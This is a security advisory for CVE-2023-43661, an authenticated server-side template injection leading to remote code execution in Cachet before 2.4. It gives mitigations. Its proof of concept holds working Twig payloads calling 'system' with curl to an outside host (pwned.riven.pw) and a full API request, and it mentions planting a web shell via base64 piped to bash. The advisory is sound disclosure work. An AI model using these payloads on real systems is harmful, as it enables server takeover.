logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2023-43661 cachethq/cachet

Package

Manager: composer
Name: cachethq/cachet
Vulnerable Version: >=0 <2.4

Severity

Level: Critical

CVSS v3.1: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N

EPSS: 0.18169 pctl0.94943

Details

Cachet vulnerable to Authenticated Remote Code Execution ### Summary A template functionality which allows users to create templates allows them to execute any code on the server during the bad filtration and old twig version. Within `/cachet/app/Http/Routes/ApiRoutes.php`, and attacker could control `template` input which is passed to `laravel's` dispatched handler `/cachet/app/Bus/Handlers/Commands/Incident/CreateIncidentCommandHandler.php`. If an attacker is able to control this data, they may be able to trigger a server-side template injection vulnerability which can lead to remote code execution. This vulnerability does not exist within the [Twig](https://twig.symfony.com/) library itself, but exists during the process of the [Cachet](https://github.com/cachethq/cachet) processing of the data without any filtration. This has been patched in Cachet version 2.4. ### PoC 1. Log in as a default user (non-admin); 2. Create an incident with name `slug1` and with content: `{{ ['curl yourhost.com','']|sort('system') }}` or with any other content for `Remote code execution` via the `Twig`, for instance: `{{[0]|reduce('system','curl yourhost.com')}}`; 3. Get an `API` token from your account settings (`X-Cachet-Token`); 4. Trigger remote code execution using the `api` route: ``` POST /api/v1/incidents HTTP/1.1 Host: myapp Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: XSRF-TOKEN=eyJpdiI6InZUVVpkRmx1VFlhcytVQkQ1Zk81b1E9PSIsInZhbHVlIjoiSlE0Tmt1cjVoRHFSOHBIR3RoYlAwS0dNZlVHbm02d0tWVW1ERVRvblZTTW1TMHV2MFJUYTNwQWQyZ3pQM1VlMyIsIm1hYyI6IjU4YzAxZjgyYWE4YTU4MTExMDQ3OGRhOTNlYThlZTYxMzI5YzBhMWVhM2RjYzA2ODgzMGVhMGQ5Njg2YTMyMjkifQ%3D%3D; laravel_session=eyJpdiI6IldZcHhMSjBYRmQzUXdGTTRQbGFQTWc9PSIsInZhbHVlIjoiSkRxWncxdWs3Y29ZcXVHMlJ0U2pVVVwvMGdvSUJNK2pEMnhsR2QzVnE1MmMxMWJxUm96K1VnalwvS1pYcXE2cGllIiwibWFjIjoiMDM0MGIxNjRlM2VhOGU5Mzg2OWVkYjZjNmJhY2JlMTE3OTdkMDRkZTQ1NzI5NTMzNzI4YjA5YTcwNzM2M2E5YyJ9 Connection: close X-Cachet-Token: OeiLJ6G6kjsBXeyOo97z Content-Length: 109 Content-type: application/json {"template":"slug1", "name":"{{ ['curl pwned.riven.pw','']|sort('system') }}", "status":2, "visible":1} ``` 5. Obtain remote code execution. An attacker could also upload a web-shell using some base64 tricks with pipe to bash. ### Impact Server-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side. Template engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server. As the name suggests, server-side template injection payloads are delivered and evaluated server-side, potentially making them more dangerous than a typical client-side template injection. ### Mitigation 1. Update `TWIG` to the latest version; 2. Filter user-controlled data by any safe pattern; 3. Use `sandboxed` `twig` mode; 4. Don't allow users (non-admins) to trigger this vulnerability via the `API` endpoint.

Metadata

Created: 2023-10-16T14:20:53Z
Modified: 2023-10-16T14:20:53Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-hv79-p62r-wg3p/GHSA-hv79-p62r-wg3p.json
CWE IDs: ["CWE-74", "CWE-94"]
Alternative ID: GHSA-hv79-p62r-wg3p
Finding: F184
Auto approve: 1